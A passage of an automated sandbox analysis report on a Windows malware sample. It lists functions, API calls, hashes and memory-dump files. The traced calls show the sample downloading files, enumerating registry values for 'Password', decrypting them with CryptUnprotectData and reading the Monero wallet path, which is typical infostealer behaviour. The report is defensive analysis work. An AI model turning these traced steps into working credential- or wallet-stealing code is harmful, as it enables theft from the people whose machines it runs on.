                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 4230089145-0
                          • Opcode ID: efa5b85c2f80bb9dd7cf6a6eafbf7fe559d4357307e17fea9fb7cca476bad78b
                          • Instruction ID: 50ee8f362d70d7b98b697bd4ce9c8b8196246e2269418891b9fc21a6fb54e411
                          • Opcode Fuzzy Hash: efa5b85c2f80bb9dd7cf6a6eafbf7fe559d4357307e17fea9fb7cca476bad78b
                          • Instruction Fuzzy Hash: F1613E7291011CEBCB55DB68DC48ADD77B5BF48300F1089A5BA0AA3291DF74AF859F90
                          Function 00706AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00706AFF
                          • InternetOpenA.WININET(0072CFEC,00000001,00000000,00000000,00000000), ref: 00706B2C
                          • StrCmpCA.SHLWAPI(?,010DE538), ref: 00706B4A
                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00706B6A
                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00706B88
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00706BA1
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00706BC6
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00706BF0
                          • CloseHandle.KERNEL32(00000000), ref: 00706C10
                          • InternetCloseHandle.WININET(00000000), ref: 00706C17
                          • InternetCloseHandle.WININET(?), ref: 00706C21
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                          • String ID:
                          • API String ID: 2500263513-0
                          • Opcode ID: da18afbdb2d8af6ba1ec0165985515162aeacd73c0226149ffbf12eb38053ebe
                          • Instruction ID: d4c6ba3c3ba7aca41dc7c570c54eaaf3711b5228aef4822e99a1d5df00519e75
                          • Opcode Fuzzy Hash: da18afbdb2d8af6ba1ec0165985515162aeacd73c0226149ffbf12eb38053ebe
                          • Instruction Fuzzy Hash: 40417CB1A10205EBEB24DB64DC89FAF77A8EB04700F104554FA05E72C0EF74AE459BA4
                          Function 0070BBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070BC1F
                          • lstrlen.KERNEL32(00000000), ref: 0070BC52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070BC7C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070BC84
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070BCAC
                          • lstrlen.KERNEL32(00734AD4), ref: 0070BD23
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: d2973d6f5c6b1e1c0ea44a791d5dbd92054942a2eaaaaf62ef2c8845d7d9b8e0
                          • Instruction ID: 48e257e5d30de0600047fffe0d91713113a2d625bab3ee2ecda6de804e765978
                          • Opcode Fuzzy Hash: d2973d6f5c6b1e1c0ea44a791d5dbd92054942a2eaaaaf62ef2c8845d7d9b8e0
                          • Instruction Fuzzy Hash: 25A18171614205CFCB25EF68D94DA5EB7F0AF44304F188269E806E72A2DB39DD42DF50
                          Function 00725EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                          Download Yara Rule
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00725F2A
                          • std::_Xinvalid_argument.LIBCPMT ref: 00725F49
                          • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00726014
                          • memmove.MSVCRT(00000000,00000000,?), ref: 0072609F
                          • std::_Xinvalid_argument.LIBCPMT ref: 007260D0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 1975243496-4289949731
                          • Opcode ID: eb99f3027cf1e141be01f34573d76ba3efc03461d184fbf5a56181a4cba5538e
                          • Instruction ID: 15fd14741b7a3701849d020b09fe50ef57db6f9d504ab31aaf003d197e2c4e8c
                          • Opcode Fuzzy Hash: eb99f3027cf1e141be01f34573d76ba3efc03461d184fbf5a56181a4cba5538e
                          • Instruction Fuzzy Hash: BB618070700514DBDB28CF5CE9D4D6EB3B6EF84704B244A5AE49287382E739EE809795
                          Function 0071E049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E06F
                          • lstrcat.KERNEL32(?,00000000), ref: 0071E07D
                          • lstrcat.KERNEL32(?,?), ref: 0071E098
                          • lstrcat.KERNEL32(?,?), ref: 0071E0AC
                          • lstrcat.KERNEL32(?,010CAF50), ref: 0071E0C0
                          • lstrcat.KERNEL32(?,?), ref: 0071E0D4
                          • lstrcat.KERNEL32(?,010DD1C8), ref: 0071E0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0071E126
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFile
                          • String ID:
                          • API String ID: 3428472996-0
                          • Opcode ID: 95a5f3415ec19f13e31c6a2585c5e9f3695b1641c625f226bbaa1aa11b30cd5b
                          • Instruction ID: b4ff5dbe8050d984ff30b1241d862f565166f69f82b92ee70525fa55c3158ced
                          • Opcode Fuzzy Hash: 95a5f3415ec19f13e31c6a2585c5e9f3695b1641c625f226bbaa1aa11b30cd5b
                          • Instruction Fuzzy Hash: 9E41417292011CDBCB25DB68DC496DD77B5BF48300F104A95F90AA3291DF789F869F90
                          Function 00707A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 007077D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00707805
                            • Part of subcall function 007077D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0070784A
                            • Part of subcall function 007077D0: StrStrA.SHLWAPI(?,Password), ref: 007078B8
                            • Part of subcall function 007077D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 007078EC
                            • Part of subcall function 007077D0: HeapFree.KERNEL32(00000000), ref: 007078F3
                          • lstrcat.KERNEL32(00000000,00734AD4), ref: 00707A90
                          • lstrcat.KERNEL32(00000000,?), ref: 00707ABD
                          • lstrcat.KERNEL32(00000000, : ), ref: 00707ACF
                          • lstrcat.KERNEL32(00000000,?), ref: 00707AF0
                          • wsprintfA.USER32 ref: 00707B10
                          • lstrcpy.KERNEL32(00000000,?), ref: 00707B39
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00707B47
                          • lstrcat.KERNEL32(00000000,00734AD4), ref: 00707B60
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                          • String ID: :
                          • API String ID: 398153587-3653984579
                          • Opcode ID: fdb0ce142b7bc4a7a0ce334b672e1c7bd52e58c5d05f623a54eaccd5c84c4be9
                          • Instruction ID: 78d657925be93a64bfc58ba71de5625463fa988f4188491f95c769deed732244
                          • Opcode Fuzzy Hash: fdb0ce142b7bc4a7a0ce334b672e1c7bd52e58c5d05f623a54eaccd5c84c4be9
                          • Instruction Fuzzy Hash: 143175F2E18214EFCB28DB68DC489ABB7B9EB84704F144619F50593251DB78F941DBA0
                          Function 007181B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 0071820C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00718243
                          • lstrlen.KERNEL32(00000000), ref: 00718260
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00718297
                          • lstrlen.KERNEL32(00000000), ref: 007182B4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007182EB
                          • lstrlen.KERNEL32(00000000), ref: 00718308
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00718337
                          • lstrlen.KERNEL32(00000000), ref: 00718351
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00718380
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 73c8566535fad00c1c5eeb7687360c8de824bc2a60a3b68eb88b5e1410d3f0be
                          • Instruction ID: 8ce0b55902977407fdafe6542a5a7dbd787c83ff9d853c8c53a3127daf12735b
                          • Opcode Fuzzy Hash: 73c8566535fad00c1c5eeb7687360c8de824bc2a60a3b68eb88b5e1410d3f0be
                          • Instruction Fuzzy Hash: 41518E71A10602DBDB54DF6CD858AAEB7E4EF00700F154614AD16EB285DF38ED91CBE1
                          Function 007077D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00707805
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0070784A
                          • StrStrA.SHLWAPI(?,Password), ref: 007078B8
                            • Part of subcall function 00707750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0070775E
                            • Part of subcall function 00707750: RtlAllocateHeap.NTDLL(00000000), ref: 00707765
                            • Part of subcall function 00707750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0070778D
                            • Part of subcall function 00707750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 007077AD
                            • Part of subcall function 00707750: LocalFree.KERNEL32(?), ref: 007077B7
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007078EC
                          • HeapFree.KERNEL32(00000000), ref: 007078F3
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00707A35
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                          • String ID: Password
                          • API String ID: 356768136-3434357891
                          • Opcode ID: ad07c437cc63b8b6d035cf1b6b2a51e5bd50fe64fffcdb9024807fe5a540a75a
                          • Instruction ID: d362682771b43881c749998c53bf9a4db182eb454acf85ab0e958252d0e1a9ba
                          • Opcode Fuzzy Hash: ad07c437cc63b8b6d035cf1b6b2a51e5bd50fe64fffcdb9024807fe5a540a75a
                          • Instruction Fuzzy Hash: AF714FB1D0421DEBDB14DF94DC84ADEB7F9EF48300F108269E509A7240EB756A89CF91
                          Function 00701120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00701135
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0070113C
                          • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00701159
                          • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00701173
                          • RegCloseKey.ADVAPI32(?), ref: 0070117D
                          Strings
                          • SOFTWARE\monero-project\monero-core, xrefs: 0070114F
                          • wallet_path, xrefs: 0070116D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                          • API String ID: 3225020163-4244082812
                          • Opcode ID: 40df330bdb8500ca1befdbbca74dbf2f5acaa08305043fd32722a0384b502749
                          • Instruction ID: 8250a515f432563c512fa7bd0ca0ad5380d5e5219d4a4ce467936315fa827263
                          • Opcode Fuzzy Hash: 40df330bdb8500ca1befdbbca74dbf2f5acaa08305043fd32722a0384b502749
                          • Instruction Fuzzy Hash: D9F090B5644308BBE7049BE09C8DFEB7B7CEB04715F000154FE05E2280EAB05A449BA0
                          Function 00709DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • memcmp.MSVCRT(?,v20,00000003), ref: 00709E04
                          • memcmp.MSVCRT(?,v10,00000003), ref: 00709E42
                          • LocalAlloc.KERNEL32(00000040), ref: 00709EA7
                            • Part of subcall function 007271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007271FE
                          • lstrcpy.KERNEL32(00000000,00734C48), ref: 00709FB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
